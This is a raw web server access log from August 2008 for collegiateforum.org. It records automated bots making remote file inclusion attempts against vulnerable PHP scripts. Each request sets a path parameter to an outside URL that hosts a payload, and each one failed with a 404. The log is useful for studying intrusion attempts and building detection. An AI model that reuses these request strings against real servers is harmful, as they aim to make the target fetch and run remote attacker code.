72.9.248.162 - - [25/Aug/2008:07:45:03 -0700] "GET /logs/access_080324.log/home.php?pagina=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.9.248.162 - - [25/Aug/2008:07:45:03 -0700] "GET /home.php?pagina=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.9.248.162 - - [25/Aug/2008:07:45:17 -0700] "GET /logs/home.php?pagina=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:45:18 -0700] "GET /logs/access_080211.log/home.php?pagina=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:45:47 -0700] "GET /logs/access_080526.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:45:47 -0700] "GET /contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:45:47 -0700] "GET /logs/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:46:41 -0700] "GET /logs/access_080526.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:46:42 -0700] "GET /contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:46:42 -0700] "GET /logs/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:46:55 -0700] "GET /logs/access_080128.log%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:47:00 -0700] "GET /logs/access_080519.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
77.235.44.201 - - [25/Aug/2008:07:47:46 -0700] "GET /logs/access_080519.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
69.16.207.34 - - [25/Aug/2008:07:47:53 -0700] "GET /logs/access_080204.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
69.16.207.34 - - [25/Aug/2008:07:47:53 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:48:29 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:48:29 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.238.172.13 - - [25/Aug/2008:07:48:36 -0700] "GET /logs/access_080324.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
72.9.248.162 - - [25/Aug/2008:07:48:51 -0700] "GET /logs/access_080324.log/home.php?pagina=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.9.248.162 - - [25/Aug/2008:07:48:52 -0700] "GET /home.php?pagina=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.9.248.162 - - [25/Aug/2008:07:48:52 -0700] "GET /logs/home.php?pagina=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:49:04 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:49:05 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:49:06 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:49:06 -0700] "GET /logs/access_080526.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:49:07 -0700] "GET /contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:49:07 -0700] "GET /logs/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:49:40 -0700] "GET /logs/access_080526.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:49:41 -0700] "GET /contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:49:41 -0700] "GET /logs/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:50:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.72.181.178 - - [25/Aug/2008:07:50:46 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://albgroup.freeunlimitedweb.com/Jon/rid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
217.172.186.250 - - [25/Aug/2008:07:51:13 -0700] "GET /logs/access_080128.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.186.250 - - [25/Aug/2008:07:51:13 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.186.250 - - [25/Aug/2008:07:51:13 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
121.124.127.40 - - [25/Aug/2008:07:51:24 -0700] "GET /logs/access_080519.log/contenido.php?sec=http://polyphoniconline.com/links/languages/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
66.225.221.197 - - [25/Aug/2008:07:51:35 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.225.221.197 - - [25/Aug/2008:07:51:35 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.225.221.197 - - [25/Aug/2008:07:51:35 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
87.106.101.71 - - [25/Aug/2008:07:51:55 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.101.71 - - [25/Aug/2008:07:51:55 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.101.71 - - [25/Aug/2008:07:51:55 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.232.196.106 - - [25/Aug/2008:07:52:18 -0700] "GET /logs/access_080324.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:07:52:50 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:07:52:50 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:07:52:50 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:07:52:50 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:07:52:50 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:07:52:50 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:52:58 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:52:58 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:52:58 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:53:09 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:54:03 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vobucks.com/bo.do?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.collegiateforum.org"
66.221.68.20 - - [25/Aug/2008:07:54:04 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vobucks.com/bo.do?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:07:55:47 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
206.221.191.24 - - [25/Aug/2008:07:55:54 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
206.221.191.24 - - [25/Aug/2008:07:55:54 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
206.221.191.24 - - [25/Aug/2008:07:55:54 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
87.106.101.71 - - [25/Aug/2008:07:56:24 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.225.219.155 - - [25/Aug/2008:07:57:19 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.225.219.155 - - [25/Aug/2008:07:57:19 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.49.100.20 - - [25/Aug/2008:07:58:12 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
200.49.100.20 - - [25/Aug/2008:07:58:17 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
200.49.100.20 - - [25/Aug/2008:07:58:18 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:08:00:02 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
208.98.1.205 - - [25/Aug/2008:08:00:02 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
217.172.186.250 - - [25/Aug/2008:08:00:09 -0700] "GET /logs/access_080121.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:08:04:13 -0700] "GET //index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.111.11.7 - - [25/Aug/2008:08:04:13 -0700] "GET //index.php?abg_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.39.34 - - [25/Aug/2008:08:05:09 -0700] "GET /logs/access.log/plugins/safehtml/safehtml.php?dir[plugins]=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
74.53.39.34 - - [25/Aug/2008:08:05:09 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
74.53.39.34 - - [25/Aug/2008:08:05:09 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
66.225.219.155 - - [25/Aug/2008:08:06:32 -0700] "GET /logs/access_080428.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:08:07:18 -0700] "GET /logs/access_080630.log/main.php?x=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:08:07:18 -0700] "GET /main.php?x=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:08:07:18 -0700] "GET /logs/main.php?x=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:08:05 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:08:05 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:08:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:08:35 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:08:52 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:08:53 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:08:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:08:08:57 -0700] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:08:09:07 -0700] "GET /logs/access_080526.log/index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:08:09:24 -0700] "GET /logs/access_080526.log/index.php?conteudo=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:09:47 -0700] "GET /logs/access_080211.log/index.php?redir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:09:48 -0700] "GET /index.php?redir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:09:48 -0700] "GET /logs/index.php?redir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:10:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:10:10 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:10:10 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:10:14 -0700] "GET /logs/index.php?redir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:10:17 -0700] "GET /logs/access.log/index.php?redir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:08:10:17 -0700] "GET /index.php?redir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:08:10:41 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:10:47 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:10:47 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:08:10:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:11:20 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:11:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:11:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
67.15.116.252 - - [25/Aug/2008:08:11:58 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.netops-fr.info/remote/ident.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.116.252 - - [25/Aug/2008:08:11:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.netops-fr.info/remote/ident.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.116.252 - - [25/Aug/2008:08:11:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.netops-fr.info/remote/ident.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:08:12:02 -0700] "GET /logs/access_080414.log/main.php?x=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
